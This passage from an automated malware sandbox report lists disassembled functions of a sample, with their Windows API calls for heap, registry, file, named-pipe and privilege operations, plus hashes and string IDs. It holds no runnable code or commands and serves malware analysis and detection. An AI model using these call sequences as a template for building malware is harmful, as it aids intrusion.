                      • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 0037D070
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0037D096
                      • memcpy.NTDLL(00000000,?,?), ref: 0037D0AA
                      • memcpy.NTDLL(?,?,?), ref: 0037D0CA
                      • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0037D1CC
                        • Part of subcall function 0037B206: RtlAllocateHeap.NTDLL(00000000,?), ref: 0037B285
                        • Part of subcall function 0037B206: wsprintfA.USER32 ref: 0037B33D
                        • Part of subcall function 0037B206: memcpy.NTDLL(00000000,?,?), ref: 0037B382
                        • Part of subcall function 0037B206: InterlockedExchange.KERNEL32(0039D22C,00000000), ref: 0037B3A0
                        • Part of subcall function 0037B206: HeapFree.KERNEL32(00000000,00000000), ref: 0037B3E3
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0037D214
                        • Part of subcall function 0038AC59: RtlLeaveCriticalSection.NTDLL(00000000), ref: 0038ACD6
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$memcpy$Allocate$CriticalSectionlstrlen$Leave$EnterEventExchangeInterlockedSleeplstrcpynmemmovememsetwsprintf
                      • String ID: GET $GET $OPTI$OPTI$POST$PUT
                      • API String ID: 685776946-647159250
                      • Opcode ID: ea4177eae4d43d4bd150171337dc7492029e60294a307a7f9fe862ca058d7c7e
                      • Instruction ID: a5bd01b4ba99d080f2e5235a14595d49b187c175b625467295c2ffdf8587615f
                      • Opcode Fuzzy Hash: ea4177eae4d43d4bd150171337dc7492029e60294a307a7f9fe862ca058d7c7e
                      • Instruction Fuzzy Hash: BCD14A31A00205EFDB26DFA8CD85BA9BBB9FF04300F158099F819AB291D739ED51DB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00632EC0, Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 252registrystringmemoryCOMMON
                      Download Yara Rule
                      APIs
                      • StrChrA.SHLWAPI(!Cc,0000005F), ref: 00632F03
                      • lstrcpy.KERNEL32(?,?), ref: 00632F1B
                      • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00632F51
                      • lstrlenW.KERNEL32 ref: 00632F88
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00632F9D
                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00632FE8
                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00632FFA
                      • lstrcmpiW.KERNEL32(00000000), ref: 00633011
                      • HeapFree.KERNEL32(00000000,?,?), ref: 00633196
                        • Part of subcall function 006341F8: lstrlenW.KERNEL32(00000000,?,!Cc,00633030,00000000,?), ref: 0063420B
                        • Part of subcall function 006341F8: lstrlen.KERNEL32(?), ref: 00634216
                        • Part of subcall function 006341F8: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0063422B
                        • Part of subcall function 006341F8: wsprintfW.USER32 ref: 00634243
                        • Part of subcall function 006344D4: lstrlenW.KERNEL32(00633038,?,00000000,?,!Cc,00633038,00000000), ref: 006344DD
                        • Part of subcall function 006344D4: memcpy.NTDLL(00000000,00633038,00000000,00000000,?,?,!Cc,00633038,00000000), ref: 00634507
                        • Part of subcall function 006344D4: memset.NTDLL ref: 0063451B
                      • lstrcpy.KERNEL32(?,006380FA), ref: 00633053
                        • Part of subcall function 00632BE1: GetLastError.KERNEL32 ref: 00632C62
                        • Part of subcall function 00632BE1: SetEndOfFile.KERNEL32(?), ref: 00632C6E
                        • Part of subcall function 00632BE1: CloseHandle.KERNEL32(?), ref: 00632C77
                        • Part of subcall function 00632BE1: GetLastError.KERNEL32 ref: 00632C7F
                        • Part of subcall function 00632BE1: GetLastError.KERNEL32 ref: 00632CBA
                        • Part of subcall function 00632BE1: FlushFileBuffers.KERNEL32(00000000), ref: 00632CC4
                        • Part of subcall function 00632BE1: GetLastError.KERNEL32 ref: 00632CCC
                      • lstrcpy.KERNEL32(?,?), ref: 006330AC
                      • RegCreateKeyA.ADVAPI32(?,?,?), ref: 006330C0
                      • RegQueryValueExA.ADVAPI32(?,00638256,00000000,?,?,?), ref: 006330E3
                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?,?,?,?), ref: 00633146
                      • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 00633161
                      • RegDeleteValueW.ADVAPI32(?,006376D0), ref: 0063316F
                      • RegCloseKey.ADVAPI32(?), ref: 00633178
                      • RegCloseKey.ADVAPI32(?), ref: 00633181
                      • HeapFree.KERNEL32(00000000,00000000), ref: 006331B9
                      • RegCloseKey.ADVAPI32(?), ref: 006331CB
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseErrorHeapLastlstrlen$CreateOpenlstrcpy$AllocateDirectoryFileFreeValue$BuffersDeleteFlushHandleQuerylstrcmpimemcpymemsetwsprintf
                      • String ID: !Cc
                      • API String ID: 2299567637-3374438881
                      • Opcode ID: 2df8ad261926e904fb8f17c0965e205c000bbbdbb0c78042e2e0f21fea27f1a5
                      • Instruction ID: a3a8f1609a39ddf5788729a961c6bd70d94ec558c8fb16d4e005f0cdec3d9b29
                      • Opcode Fuzzy Hash: 2df8ad261926e904fb8f17c0965e205c000bbbdbb0c78042e2e0f21fea27f1a5
                      • Instruction Fuzzy Hash: D09124B1900219FFDF219F94DD89DEEBBBAFF05301F108069F901A2220D7309E559BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003753F7, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 436synchronizationmemorythreadCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0037469E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 003746D1
                        • Part of subcall function 0037469E: GetLastError.KERNEL32 ref: 00374778
                        • Part of subcall function 0037469E: ReleaseMutex.KERNEL32(00000000), ref: 00374781
                        • Part of subcall function 0037469E: CloseHandle.KERNEL32(00000000), ref: 0037478F
                        • Part of subcall function 0037469E: GetLastError.KERNEL32 ref: 0037479C
                        • Part of subcall function 00374557: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0037456E
                        • Part of subcall function 00374557: CreateWaitableTimerA.KERNEL32(0039D2D8,?,?), ref: 0037458D
                        • Part of subcall function 00374557: GetLastError.KERNEL32 ref: 0037459D
                        • Part of subcall function 00374557: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 003745E4
                        • Part of subcall function 00374557: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 00374618
                      • GetVersionExA.KERNEL32 ref: 003754FA
                      • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 0037550D
                      • wsprintfA.USER32 ref: 0037553F
                        • Part of subcall function 00375124: lstrcmp.KERNEL32(?,?), ref: 0037519B
                        • Part of subcall function 00375124: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_0000408F,?,00000001), ref: 0037526D
                        • Part of subcall function 00375124: GetCurrentThread.KERNEL32 ref: 0037527E
                        • Part of subcall function 00375124: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 003752DC
                        • Part of subcall function 00375124: wsprintfA.USER32 ref: 003752ED
                        • Part of subcall function 00375124: lstrlen.KERNEL32(00000000,00000000), ref: 003752F8
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 003755C3
                        • Part of subcall function 00373DA8: RegCreateKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DBD
                        • Part of subcall function 00373DA8: RegOpenKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DCA
                        • Part of subcall function 00373DA8: lstrlen.KERNEL32(0039D244,00000000,00000000,00000000,?,?,?,00373E29,00000000,00000000,00000000,00000000,?,?,?,00374EBE), ref: 00373DEB
                        • Part of subcall function 003743BE: RegOpenKeyA.ADVAPI32(80000001,?), ref: 003743DC
                        • Part of subcall function 003743BE: RtlAllocateHeap.NTDLL(00000000,?), ref: 00374412
                        • Part of subcall function 003743BE: HeapFree.KERNEL32(00000000,?), ref: 0037444B
                        • Part of subcall function 003743BE: RegCloseKey.ADVAPI32(?), ref: 00374454
                      • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 0037566B
                        • Part of subcall function 00375393: WaitForSingleObject.KERNEL32(?,00000000), ref: 0037539F
                        • Part of subcall function 00375393: HeapFree.KERNEL32(00000000,?,?), ref: 003753CD
                        • Part of subcall function 00375393: ResetEvent.KERNEL32(?,?), ref: 003753E7
                      • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 003756DC
                        • Part of subcall function 0038EDFA: GetTickCount.KERNEL32(?,00000000,?,?), ref: 0038EE36
                        • Part of subcall function 0038EDFA: GetTickCount.KERNEL32 ref: 0038EF1E
                        • Part of subcall function 0038EDFA: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038EF32
                        • Part of subcall function 0038EDFA: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038EF50
                        • Part of subcall function 0038EDFA: StrTrimA.SHLWAPI(00000000,003973F8), ref: 0038EF86
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?,00000000), ref: 0038F03B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?,0039F27A), ref: 0038F04D
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,00000000,?), ref: 0038F05B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?), ref: 0038F06B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?), ref: 0038F07B
                      • _allmul.NTDLL(0039CB54,00000000,FF676980,000000FF), ref: 00375780
                        • Part of subcall function 00374151: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 003741A5
                        • Part of subcall function 00374151: lstrcmpi.KERNEL32(00000000,0039F23C), ref: 003741C5
                        • Part of subcall function 00374151: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037420A
                        • Part of subcall function 00374151: HeapFree.KERNEL32(00000000,?,?), ref: 0037421B
                      • HeapFree.KERNEL32(00000000,?,?), ref: 00375738
                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 003757B0
                      • ReleaseMutex.KERNEL32(?), ref: 003757CD
                      • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00375821
                      • SwitchToThread.KERNEL32 ref: 0037583D
                      • ReleaseMutex.KERNEL32(?), ref: 00375847
                        • Part of subcall function 003738C7: HeapFree.KERNEL32(00000000,?,0039E1D3), ref: 00373907
                        • Part of subcall function 003738C7: RtlAllocateHeap.NTDLL(00000000,00010000,0039E1D3), ref: 00373925
                        • Part of subcall function 003738C7: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 00373954
                        • Part of subcall function 003738C7: HeapFree.KERNEL32(00000000,00000000,0000011B), ref: 003739BE
                        • Part of subcall function 003738C7: RtlAllocateHeap.NTDLL(00000000,00000400,0039E1D3), ref: 00373A83
                        • Part of subcall function 003738C7: wsprintfA.USER32 ref: 00373A97
                        • Part of subcall function 003738C7: lstrlen.KERNEL32(00000000,00000000), ref: 00373AA2
                        • Part of subcall function 003738C7: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00373ABC
                        • Part of subcall function 003738C7: HeapFree.KERNEL32(00000000,?,0039E1D3), ref: 00373ADE
                        • Part of subcall function 003738C7: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00373AF9
                        • Part of subcall function 003738C7: wsprintfA.USER32 ref: 00373B09
                        • Part of subcall function 003738C7: lstrlen.KERNEL32(00000000,00000000), ref: 00373B14
                        • Part of subcall function 003738C7: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00373B2E
                        • Part of subcall function 003738C7: HeapFree.KERNEL32(00000000,?,?), ref: 00373B3E
                      • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 003758B3
                      • SwitchToThread.KERNEL32 ref: 003758CF
                      • ReleaseMutex.KERNEL32(?), ref: 003758D9
                        • Part of subcall function 00375347: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 00375378
                      • WaitForSingleObject.KERNEL32(?,00000000), ref: 003758E9
                        • Part of subcall function 00374505: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00374512
                        • Part of subcall function 00374505: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0037454C
                        • Part of subcall function 0038E8FE: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E90B
                        • Part of subcall function 0038E8FE: Sleep.KERNEL32(0000000A,?,00397044,0038E984,0039D480,00000000,00397050,0038F19B), ref: 0038E915
                        • Part of subcall function 0038E8FE: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038E964
                        • Part of subcall function 00374354: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 00374376
                        • Part of subcall function 00374354: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 003743A7
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Allocate$Wait$lstrlen$CriticalErrorLastMutexReleaseSectionThreadTime_allmulwsprintf$CreateMultipleObjectObjectsOpenSingleTimerWaitable$CloseCountCurrentEnterEventFileLeaveSwitchSystemTickmemcpy$CallHandleNamedPipeResetSleepTrimVersionlstrcmplstrcmpi
                      • String ID: Main
                      • API String ID: 1772234139-521822810
                      • Opcode ID: 3c02efa6d2e9fa9a034a649a651587892438c684a2da0f6feb8b9696b37cf658
                      • Instruction ID: f4b419efbaebc59ee72f09b89a4bd63fb31003f8da756e9902ee63c029325c55
                      • Opcode Fuzzy Hash: 3c02efa6d2e9fa9a034a649a651587892438c684a2da0f6feb8b9696b37cf658
                      • Instruction Fuzzy Hash: 60F18E71408345EFDB26AF65CC8196ABBEDFB85364F014A2EF598922A0D775DC00CF52
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00389859, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 208filememorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 003898C0
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 003898F2
                      • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00389906
                      • CloseHandle.KERNEL32(00000094), ref: 0038991D
                      • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 00389929
                      • lstrcat.KERNEL32(00001000,0039FAF9), ref: 00389963
                      • FindNextFileA.KERNEL32(?,?), ref: 003899AB
                      • StrChrA.SHLWAPI(?,0000002E), ref: 00389A19
                      • memcpy.NTDLL(0039D494,?,00000000), ref: 00389A52
                      • FindNextFileA.KERNEL32(?,?), ref: 00389A67
                      • CompareFileTime.KERNEL32(?,?), ref: 00389A90
                      • HeapFree.KERNEL32(00000000,0039D494), ref: 00389AC6
                      • HeapFree.KERNEL32(00000000,00001000), ref: 00389AD6
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$FindFreeHeapNextTime$CloseCompareCreateHandlelstrcatmemcpymemset
                      • String ID: .dll$pnls$}nls
                      • API String ID: 293928577-861231531
                      • Opcode ID: b3a5ae599700cac2b5d73e38da8f6b35f990f7c8eb0439d50a3bcd4165879588
                      • Instruction ID: 3b3984ec37847098780ed7aca673c88e9cd10cfc0f4301ee5efdc3006d9b611a
                      • Opcode Fuzzy Hash: b3a5ae599700cac2b5d73e38da8f6b35f990f7c8eb0439d50a3bcd4165879588
                      • Instruction Fuzzy Hash: 71813A72D00219AFDF12EFA5DC85AEEBBBDFF48300F1504AAE505E6290E7759A448F50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00633ECF, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 209filememorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00633F6D
                      • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00633F81
                      • CloseHandle.KERNEL32(?), ref: 00633F98
                      • StrRChrA.SHLWAPI(006311A9,00000000,0000005C), ref: 00633FA4
                      • lstrcat.KERNEL32(006311A9,0063825D), ref: 00633FDE
                      • FindNextFileA.KERNEL32(?,?), ref: 00634026
                      • StrChrA.SHLWAPI(?,0000002E), ref: 00634094
                      • memcpy.NTDLL(0063618C,?,00000000), ref: 006340CD
                      • FindNextFileA.KERNEL32(?,?), ref: 006340E2
                      • CompareFileTime.KERNEL32(?,?), ref: 0063410B
                      • HeapFree.KERNEL32(00000000,0063618C,00638049), ref: 00634141
                      • HeapFree.KERNEL32(00000000,006311A9), ref: 00634151
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$FindFreeHeapNextTime$CloseCompareCreateHandlelstrcatmemcpy
                      • String ID: }nls
                      • API String ID: 1353604349-4196156762
                      • Opcode ID: d2130d7385b66fe4a460e6c0904ecad8bbd10cbf1ee8842e41da61f0ec12d69c
                      • Instruction ID: 5151b66f8fc60a883e44c5883ad35b7448c89b89ff5a4e7c1cde81b16feb884b
                      • Opcode Fuzzy Hash: d2130d7385b66fe4a460e6c0904ecad8bbd10cbf1ee8842e41da61f0ec12d69c
                      • Instruction Fuzzy Hash: 3F812D72D00219AFDB15DFA5DC85AEEBBBAFF48300F104566E515E2260DB71AA44CFA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003738C7, Relevance: 21.2, APIs: 14, Instructions: 215memorystringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00373E0D: RegQueryValueExA.KERNEL32(00000000,0037D7B1,00000000,0037D7B1,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00374EBE,0039E1C6), ref: 00373E45
                        • Part of subcall function 00373E0D: RtlAllocateHeap.NTDLL(00000000,?), ref: 00373E59
                        • Part of subcall function 00373E0D: HeapFree.KERNEL32(00000000,?), ref: 00373E8F
                        • Part of subcall function 00373E0D: RegCloseKey.ADVAPI32(00000000,?,?,?,00374EBE,0039E1C6,0037D7B1,00000000,00000000,00000000,00000000,?,?,?,0037D7B1,00000000), ref: 00373E9D
                      • HeapFree.KERNEL32(00000000,?,0039E1D3), ref: 00373907
                      • RtlAllocateHeap.NTDLL(00000000,00010000,0039E1D3), ref: 00373925
                      • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 00373954
                        • Part of subcall function 0038EDFA: GetTickCount.KERNEL32(?,00000000,?,?), ref: 0038EE36
                        • Part of subcall function 0038EDFA: GetTickCount.KERNEL32 ref: 0038EF1E
                        • Part of subcall function 0038EDFA: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038EF32
                        • Part of subcall function 0038EDFA: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038EF50
                        • Part of subcall function 0038EDFA: StrTrimA.SHLWAPI(00000000,003973F8), ref: 0038EF86
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?,00000000), ref: 0038F03B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?,0039F27A), ref: 0038F04D
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,00000000,?), ref: 0038F05B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?), ref: 0038F06B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?), ref: 0038F07B
                      • HeapFree.KERNEL32(00000000,00000000,0000011B), ref: 003739BE
                        • Part of subcall function 0038EDBB: memcpy.NTDLL(0037D7B1,0037D7B1,00000000,0037D7B1,0037D7B1,0037D7B1,00000000,?,?,00374EE9,00000000,00000001,00000000,0039E1C6,0037D7B1,00000000), ref: 0038EDDE
                      • HeapFree.KERNEL32(00000000,?,?), ref: 00373B3E
                        • Part of subcall function 00389B83: memset.NTDLL ref: 00389BB1
                        • Part of subcall function 00389B83: StrTrimA.SHLWAPI(?,003973F4), ref: 00389C12
                        • Part of subcall function 00389B83: StrTrimA.SHLWAPI(00000001,003973F4), ref: 00389C31
                        • Part of subcall function 00389B83: _strupr.NTDLL ref: 00389C38
                        • Part of subcall function 00389B83: StrTrimA.SHLWAPI(?,?), ref: 00389C45
                        • Part of subcall function 00389B83: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 00389C8D
                        • Part of subcall function 00389B83: lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,?), ref: 00389CAC
                      • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00373B2E
                        • Part of subcall function 00373EAC: RegCloseKey.ADVAPI32(00000057,?,?,003728FD,0039E1CF,00000000,00000000,00000000,~FvR9,00000000,00397048,?,?,?,00374C4E,00000000), ref: 00373EF7
                      • RtlAllocateHeap.NTDLL(00000000,00000400,0039E1D3), ref: 00373A83
                      • wsprintfA.USER32 ref: 00373A97
                      • lstrlen.KERNEL32(00000000,00000000), ref: 00373AA2
                      • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00373ABC
                      • HeapFree.KERNEL32(00000000,?,0039E1D3), ref: 00373ADE
                      • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00373AF9
                      • wsprintfA.USER32 ref: 00373B09
                      • lstrlen.KERNEL32(00000000,00000000), ref: 00373B14
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                        • Part of subcall function 0037C12C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0039D244,?,?,00373DFB,0000012B,0039D244,?,?,?,00373E29,00000000,00000000), ref: 0037C16C
                        • Part of subcall function 0037C12C: CloseHandle.KERNEL32(000000FF), ref: 0037C177
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Allocate$Trimlstrlenmemcpy$Close$CountCriticalErrorLastSectionTickwsprintf$CallEnterHandleLeaveNamedPipeQueryValue_struprmemset
                      • String ID:
                      • API String ID: 100172519-0
                      • Opcode ID: 7512c2d19963d436b0948e55ab050ca68730d02a5e4bf6a3b71a0f0d4fd67bcf
                      • Instruction ID: 45147f6315eb10990822008cd615bd2423abe32eadcd574811c2a6ebd6d42630
                      • Opcode Fuzzy Hash: 7512c2d19963d436b0948e55ab050ca68730d02a5e4bf6a3b71a0f0d4fd67bcf
                      • Instruction Fuzzy Hash: 94715D72900219FFDB22EF94DC85DAEBB7DFB05340F11446AF605A2250D7795E41EBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00371586, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 78memoryfileCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0037159D
                      • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00372E03,00000094,?), ref: 003715AF
                      • StrChrA.SHLWAPI(00000000,0000003A), ref: 003715BC
                      • wsprintfA.USER32 ref: 003715D0
                      • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 003715E6
                      • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000,?,?,?), ref: 003715FF
                      • WriteFile.KERNEL32(00000000,00000000,?,?,?), ref: 00371607
                      • GetLastError.KERNEL32(?,?,?), ref: 00371615
                      • CloseHandle.KERNEL32(00000000), ref: 0037161E
                        • Part of subcall function 0037154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 0037155B
                        • Part of subcall function 0037154D: GetLastError.KERNEL32(?,00372DF9), ref: 00371572
                      • GetLastError.KERNEL32(?,00372E03,00000094,?), ref: 0037162F
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037163F
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$FileHandleHeap$AdjustAllocateCloseCreateDirectoryFreeModulePrivilegeWindowsWritewsprintf
                      • String ID: L"7
                      • API String ID: 3494808489-2580434585
                      • Opcode ID: ea741f28b4cb6cad33c240615d0ebbc85b7a1427f0fcfda487263accfea20bf4
                      • Instruction ID: 534081c4e0796bf3de0d2828247900a3a9b401be0a3bf7c19b89a90a36b6c51a
                      • Opcode Fuzzy Hash: ea741f28b4cb6cad33c240615d0ebbc85b7a1427f0fcfda487263accfea20bf4
                      • Instruction Fuzzy Hash: 8E112B72109214BFE3332B28AC4DF7B3B6CDB467A5F044026FD4AD22D0EA5A0D0586B5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003775E0, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 76stringfilememoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetTickCount.KERNEL32(00000000,00000000,00000000,L"7,00372CFD,00000000), ref: 003775F0
                      • CreateFileW.KERNEL32(00000000,80000000,00000003,0039D2D8,00000003,00000000,00000000), ref: 0037760D
                      • GetLastError.KERNEL32 ref: 003776AE
                        • Part of subcall function 00388619: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,0039D270,00000000), ref: 0038864F
                        • Part of subcall function 00388619: lstrcpy.KERNEL32(00000000,00000000), ref: 00388673
                        • Part of subcall function 00388619: lstrcat.KERNEL32(00000000,00000000), ref: 0038867B
                      • GetFileSize.KERNEL32(?,00000000,Local\,00000001), ref: 00377639
                      • CreateFileMappingA.KERNEL32(00000000,0039D2D8,00000002,00000000,00000000,?), ref: 0037764D
                      • lstrlen.KERNEL32(?), ref: 00377669
                      • lstrcpy.KERNEL32(?,?), ref: 00377679
                      • GetLastError.KERNEL32 ref: 00377681
                      • HeapFree.KERNEL32(00000000,?), ref: 00377694
                      • CloseHandle.KERNEL32(?), ref: 003776A6
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                      • String ID: L"7$Local\
                      • API String ID: 194907169-3608840339
                      • Opcode ID: 214ef461ebdcfa241091ce892aa24b64a4aa028c9f6fd470f55edf1144119082
                      • Instruction ID: 9bb63e26567384656c4950e01c93a6b9bccf6827b0cf4f42a01e171a7dd6310c
                      • Opcode Fuzzy Hash: 214ef461ebdcfa241091ce892aa24b64a4aa028c9f6fd470f55edf1144119082
                      • Instruction Fuzzy Hash: DE215EB1904208FFDB129FA5DC89A9DBFB9FB04354F10846AF909E22A0D7768E54DF50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00371791, Relevance: 18.1, APIs: 12, Instructions: 117registrythreadsleepCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 003717AC
                      • CloseHandle.KERNEL32(0039D198), ref: 0037180D
                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 0037181A
                      • GetLastError.KERNEL32(?,?,?,00000000), ref: 00371824
